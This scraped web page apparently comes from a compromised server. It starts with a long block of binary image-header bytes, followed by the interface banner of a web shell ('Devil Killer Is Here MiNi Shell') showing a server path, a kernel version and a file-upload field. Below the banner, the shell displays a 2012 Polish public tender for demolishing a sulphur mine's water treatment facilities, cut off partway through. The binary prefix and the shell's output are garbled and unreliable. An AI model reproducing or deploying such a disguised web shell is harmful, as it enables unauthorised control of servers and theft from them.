JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120822/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120822/181689-N-2012.html

<p class="kh_header"><b>Tarnobrzeg: Likwidacja obiektów Zakładu Oczyszczania Wód Kopalni Siarki Machów S.A.</b><br>
<b>Numer ogłoszenia: 181689 - 2012; data zamieszczenia: 22.08.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Kopalnia Siarki "Machów" S.A. , ul. Górnicza 11, 39-400 Tarnobrzeg, woj. podkarpackie, tel. 15 8233025, 8236948, faks 15 8233025.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.ksmachow.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: zobowiązany do stosowania ustawy na podstawie art. 3 ust. 3 Pzp.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Likwidacja obiektów Zakładu Oczyszczania Wód Kopalni Siarki Machów S.A..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest Likwidacja obiektów Zakładu Oczyszczania Wód Kopalni Siarki Machów S.A. zgodnie z zakresami prac zawartymi w przedmiarach robót stanowiących załączniki do niniejszej SIWZ oraz zgodnie z projektami budowlanymi rozbiórki - likwidacji obiektów Zakładu Oczyszczania Wód Kopalni Siarki Machów S.A. wykonanymi przez Dresler Studio, Architektura i Urbanistyka, ul. Miechowity 10/85, 31-469 Kraków (do wglądu u Zamawiającego) oraz warunkami określonymi w SIWZ.

Harmonogram likwidacji obiektów Zakładu Oczyszczania Wód:

Wykonawca wykona niżej wymienione elementy przedmiarów robót:
a) Etap I - do końca 2012 roku winny zostać zlikwidowane: 
I. Węzeł pompowni wg zakresu:

1.wyburzenie budynku pompowni wody:
-rozbiórka dachu (1.5)
-rozbiórka ścian i ścianek (1.6)
-rozkopy (1.7)
-rozbiórka posadzki (1.8)
-rozbiórka fundamentów (1.9)
-roboty ziemne 1.12)

2.wyburzenie budynku osadnika szlamu:
-rozebranie dachu (2.4)
-rozkopy (2.5)
-rozbiórka ścian (2.6)
-rozbiórka schodów (2.7)
-rozbiórka stropów (2.8)
-roboty ziemne (2.11)

3.wyburzenie budynku okrężnicy:
-rozbiórka stropodachu (3.2)
-wykop (3.3)
-rozbiórka ścian i ścianek (3.5)
-rozbiórka słupów żelbetowych (3.6)
-roboty ziemne (3.9)

4.wyburzenie budynku pompowni siarczanów:
-rozbiórka stropów (4.4)
-rozbiórka ścian (4.5)
-rozbiórka podłoża (4.6)
-rozkop (4.7)
-rozbiórka fundamentów (4.8)
-roboty ziemne (4.11)

5.wyburzenie budynku rozdzielni dla szlamowni:
-rozbiórka stropu (5.4)
-rozbiórka ścian (5.5)
-rozbiórka podłoża (5.6)
-rozkop (5.7)
-rozbiórka fundamentów (5.8)
-roboty ziemne (5.11)

6.wyburzenie kanału kablowego:
-rozbiórka ścian i ścianek (6.4)
-rozbiórka posadzki (6.5)
-roboty ziemne (6.7)


7.rozbiórka stalowej estakady i rurociągów:
-wykopy fundamentów (7.1.16 - 7.1.21)

8.likwidacja dróg, placów, chodników
-rozbiórka (8.1)
-równanie terenu (8.3)

II.Kanały, rurociągi studnie przelewowe wg zakresu:

1.likwidacja rurociągów nadziemnych:
-roboty ziemne (1.19 - 1.1.12)

2.wyburzenie studzienki nr 1:
-prace rozbiórkowe i niwelacja terenu (3.1.1 - 3.1.10)

3.wyburzenie studzienki nr 2:
-prace rozbiórkowe i niwelacja terenu (4.1.1 - 4.1.9)

4.roboty w zakresie burzenia, wyburzenia płyty wjazdu na teren stolarni
-prace rozbiórkowe i niwelacja terenu (5.1), (5.2), (5.3), (5.4)
5.wyburzenie studzienki nr 6 - (21.1)

b) Etap II - w roku 2013 winny zostać zlikwidowane:
- styczeń 2013 - 
I.Pompownia absorbenta wg zakresu:

1.wyburzenie pompowni absorbenta:
-rozbiórka dachu (1.4)
-rozbiórka ścian i słupów (1.5.1 - 1.5.2)
-rozbiórka podłoża (1.6)
-rozkop i rozbiórka fundamentów (1.7, 1.8)
-roboty ziemne (1.13)

II.Wyburzenie zbiorników reakcyjnych i zbiornika cyrkulacyjnego z mieszadłem.

1.wyburzenie zbiorników reakcyjnych i zbiornika cyrkulacyjnego z mieszadłem:
-wyburzenie fundamentów (1.2.1 - 1.2.2)
-roboty ziemne (1.6)

III.Wyburzenie filtrów gazu, drogi.

1.wyburzenie filtrów gazu:
-rozkop, rozbiórka fundamentów (1.3, 1.4)
-roboty ziemne (1.9)

2.likwidacja dróg, fundamentów:
-fundamenty koliste (2.1)

IV.Wyburzenie estakad, likwidacja rurociągów.

1.rozbiórka rurociągów:
-wykopy i  burzenie konstrukcji betonowych (1.1.9 - 1.1.12)
-roboty ziemne (1.4)

2.rozbiórka rurociągów b:
-wykopy i burzenie (2.1.10, 2.1.11, 2.2.3, 2.2.4)
-roboty ziemne (2.4)

- marzec 2013 
I.Magazyn sody amoniakalnej i magazynu absorbentu wg zakresu:

1.wyburzenie budynku magazynu i przygotowania absorbentu:
-rozbiórka stolarki drewnianej (1.3)
-rozbiórka dachu (1.5)
-rozbiórka stropów (1.6)
-rozbiórka schodów i słupów (1.7 - 1.8)
-rozbiórka ścian, ścianek, posadzki, fundamentów (1.9, 1.10, 1.11)
-rozkop (1.12)
-roboty ziemne (1.17)

2.wyburzenie budynku dyspozytorni AKP:
-wykucie z muru ościeżnic drewnianych (2.1.1)
-rozebranie pokryć dachowych, stropów, murów itp. (2.1.3 - 2.1.9)
-zasypanie wykopów po fundamentach (2.1.16 - 2.1.20)

3.likwidacja dróg:
-drogi i place (3)

- kwiecień 2013  
I.Rozbiórka węzła piecowni wg zakresu:

1.rozbiórka węzła piecowni:
-cięcie konstrukcji - płaszcza pieców (1.2.15)
-rozkop (1.3)
-rozbiórka fundamentów (1.4)
-roboty ziemne (1.9)

2.wyburzenie budynku rozdzielni RS:
-rozbiórka stropu (2.4)
-rozbiórka ścian (2.5)
-rozbiórka podłoża (2.6)
-rozkop (2.7)
-rozbiórka fundamentów (2.8)
-roboty ziemne (2.13)

- maj, czerwiec 2013 
I.Wieże desorpcji, drogi i place wg zakresu:

1.rozbiórka wież desorpcji:
-burzenie konstrukcji żelbetowych (1.2.7, 1.2.8, 1.2.10)
-rozkopy (1.4)
-roboty ziemne (1.5)
-rozbiórka drogi po północnej stronie wież (1.6.1 - 1.6.4, 1.6.7 - 1.6.10)

2.roboty w zakresie burzenia - estakady:
-wyburzenie konstrukcji betonowych (2.1.10 - 2.1.12)
-roboty ziemne (2.4) 3.1.8 - 3.1.10, (3.4)

II.Budynek magazynowania towaru, neutralizator, drogi wg zakresu:

1.wyburzenie budynku magazynu towaru:
-rozbiórka pokrycia stropodachu (1.2.1 - 1.2.3)
-rozbiórka konstrukcji żelbetowej (1.3)
-rozebranie instalacji tacy na poziomie 0,00 - (1.4)
-rozkop (1.5)
-rozbiórka fundamentów (1.6)
-roboty ziemne (1.7)

2.wyburzenie neutralizatora:
-rozbiórka neutralizatora (2.1.3 - 2.1.18)

3.wyburzenie dróg, fundamentów itp.
-fundamenty żelbetowe (3.1)

III.Hala dmuchaw wg zakresu:

1.wyburzenie budynku hali dmuchaw:
-rozbiórka dachu (1.4)
-rozbiórka ścian, stropów i słupów (1.5)
-rozkopy i rozbiórka posadzki (1.6 - 1.7)
-rozbiórka fundamentów (1.8)
-roboty ziemne (1.13)

2.wyburzenie budynku pompowni zakwaszenia
-rozbiórka dachu (2.4)
-rozbiórka ścian i ścianek (2.5)
-rozkopy (2.6)
-rozbiórka posadzki (2.7)
-rozbiórka fundamentów (2.8)
-roboty ziemne (2.13)

3.wyburzenie podestu bocznego przy hali dmuchaw:
-rozkopy (3.2)
-rozbiórka fundamentu i wywóz gruzu (3.3 - 3.4)
-roboty ziemne (3.8)

IV. Budynek flotacji, budynek przetworników, place i drogi wg zakresu:
1.wyburzenie budynku flotacji:
-rozbiórka okien i drzwi drewnianych (1.2.3, 1.2.4	)
-rozbiórka dachu (1.4)
-rozbiórka stropów (1.5)
-rozbiórka schodów żelbetowych (1.6)
-rozbiórka ścian i ścianek (1.7)
-rozbiórka posadzki (1.8)
-rozbiórka fundamentu (1.9)
-rozkop (1.10)
-roboty ziemne (1.15)

2.wyburzenie budynku przetworników:
-rozbiórka stolarki drewnianej (2.3)
-rozbiórka dachu, ścian, ścianek, posadzki, fundamentów (2.4, 2.5, 2.6, 2.7, 2.8, 2.9)
-roboty ziemne (2.13)

3.drogi i place:
-rozebranie nawierzchni z płyt betonowych (3.1)

4.likwidacja podziemnego kanału kablowego:
-wykopy (4.1.1)
-roboty ziemne (4.3)

5.rozbiórka estakady:
-burzenie konstrukcji (5.1.7, 5.1.8)
-roboty ziemne (5.4)

V. Likwidacja budynku podstacji wg zakresu:

1.wyburzenie budynku podstacji:
-rozbiórka dachu (1.4)
-rozbiórka stropów (1.5)
-rozbiórka schodów betonowych (1.6)
-rozbiórka schodów i ścianek (1.7)
-rozkopy (1.8)
-rozbiórka posadzki (1.9)
-roboty ziemne (1.14)

2.likwidacja dróg:
-drogi i place (2.1)


Wykonawca w koszty likwidacji Zamawiającego wlicza kruszenie gruzu na składowisku Ocice (przy klarowniku nr 1). 
Po zakończeniu robót wyburzeniowych, gruz betonowy i ceglany należy wywieźć na odległość do 2 km w miejsce wskazane przez Zamawiającego.
Materiał do wyrównania terenu po wyburzeniu fundamentów zabezpieczy Zamawiający, transport z odległości do 2 km na koszt Wykonawcy.

Wykonawca, przed złożeniem oferty zobowiązany jest do zapoznania się z posiadaną przez Zamawiającego dokumentacją oraz do dokonania wizji lokalnej terenu objętego zamówieniem. W przypadku nie dokonania tych czynności Wykonawca nie może wyciągać negatywnych konsekwencji wobec Zamawiającego, wypływających z faktu zaniechania ich dokonania.

Zamawiający dopuszcza możliwość powierzenia przez Wykonawcę wykonania prac stanowiących przedmiot zamówienia podwykonawcom.

Zagospodarowanie terenu budowy, urządzenie zaplecza technicznego, zasilanie w energię elektryczną, wodę itp. Wykonawca wykona we własnym zakresie.

Termin wykonania zamówienia:
rozpoczęcie: po zawarciu umowy
zakończenie: Etap I - zakończenie  - 31.12.2012r.
		Etap II - zakończenie - 30.06.2013r..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 45.11.00.00-1.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.06.2013.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Wysokość wadium
Wykonawca zobowiązany jest wnieść wadium w wysokości: 160 000,00PLN (słownie: sto sześćdziesiąt tysięcy złotych).
Wadium może być wnoszone w jednej lub kilku następujących formach:
a) pieniądzu,
b) poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo - kredytowej, z tym że poręcznie kasy jest zawsze poręczeniem pieniężnym;
c) gwarancjach bankowych,
d) gwarancjach ubezpieczeniowych,
e) poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U. Z 2007r. Nr 42, poz. 275 z późn. zm.)
Termin i sposób wniesienia wadium
Wadium należy wnieść w terminie do dnia 10.09.2012r., do godz.10:00.
Przelewem na rachunek Kopalni Siarki Machów S.A. numer: 35 1020 4913 0000 9602 0067 2519 w PEKAO BP S.A. O/Tarnobrzeg (oprocentowanie rachunku - 0%, koszt prowadzenia rachunku - 0%) z adnotacją Wadium przetargowe na wykonanie zadania pt. Likwidacja obiektów Zakładu Oczyszczania Wód Kopalni Siarki 

Machów S.A.. Za termin wniesienia wadium przyjmuje się termin uznania rachunku Zamawiającego. 
W przypadku wnoszenia wadium w formie poręczeń lub gwarancji bankowych, gwarancji ubezpieczeniowych -w każdym przypadku cesja na rzecz Kopalni Siarki Machów S.A. - oryginały dokumentów należy złożyć najpóźniej do dnia 10.09.2012r. do godz. 10:00, pokój 27, budynku administracyjnego Kopalni Siarki Machów S.A., a kopię załączyć do oferty.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena nastąpi na podstawie oświadczenia, o którym mowa w zał. nr 2 do oferty oraz na podstawie:
- aktualnego odpisu z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy Pzp, wystawionego nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert, a w stosunku do osób fizycznych oświadczenia w zakresie art. 24 ust. 1 pkt 2 ustawy Pzp;
- aktualnego zaświadczenia właściwego naczelnika urzędu skarbowego potwierdzającego, że wykonawca nie zalega z opłacaniem podatków lub zaświadczenia, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawionego nie wcześniej niż 3 miesiące przed upływem terminu składania ofert;
- aktualnego zaświadczenia właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzającego, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenia, że uzyskał
przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawionego nie wcześniej niż 3 miesiące przed upływem terminu składania ofert;</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena nastąpi na podstawie oświadczenia, o którym mowa w zał. nr 2 do oferty oraz na podstawie 
sporządzonego przez Wykonawcę wykazu robót budowlanych w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich rodzaju i wartości, daty i miejsca wykonania (wg załącznika nr 3 do oferty) oraz załączeniem dokumentu potwierdzającego, że te roboty zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone np. referencji.
Za niezbędne uznaje się wykonanie przez Wykonawcę, co najmniej 1 roboty budowlanej polegającej na wykonaniu rozbiórki przemysłowego obiektu budowlanego. Wartość i zakres wykonanych przez Wykonawcę prac rozbiórkowych winny być porównywalne z wartością i zakresem prac związanych z wykonaniem niniejszego zamówienia. Zamawiający za wartość i zakres porównywalne uzna takie, które stanowią nie mniej niż 80% wartości wykonania przedmiotu niniejszego zamówienia.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena nastąpi na podstawie oświadczenia, o którym mowa w zał. nr 2 do oferty</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena nastąpi na podstawie oświadczenia, o którym mowa w zał. nr 2 do oferty oraz na podstawie:
-  na podstawie wykazu osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami; (wg załącznika nr 4 do oferty). 
Za niezbędne uznaje się dysponowanie przez Wykonawcę, co najmniej 1 osobą posiadającą uprawnienia do objęcia kierownictwa budowy (rozbiórki) w specjalności konstrukcyjno budowlanej bez ograniczeń wraz z zaświadczeniem o przynależności do właściwej Izby Inżynierów Budownictwa i posiadającą co najmniej 5 lat doświadczenia w kierowaniu budowami oraz w pełnieniu funkcji kierownika budowy co najmniej jednej rozbiórki przemysłowego obiektu budowlanego o wartości i zakresie porównywalnym z wartością i zakresem przedmiotu niniejszego zamówienia.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena nastąpi na podstawie oświadczenia, o którym mowa w zał. nr 2 do oferty oraz na podstawie opłaconej polisy, a w przypadku jej braku innego 
dokumentu potwierdzającego, że Wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych w zakresie niezbędnym do wykazania spełniania warunku  wiedzy i doświadczenia, wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz załączeniem dokumentu potwierdzającego, że roboty zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
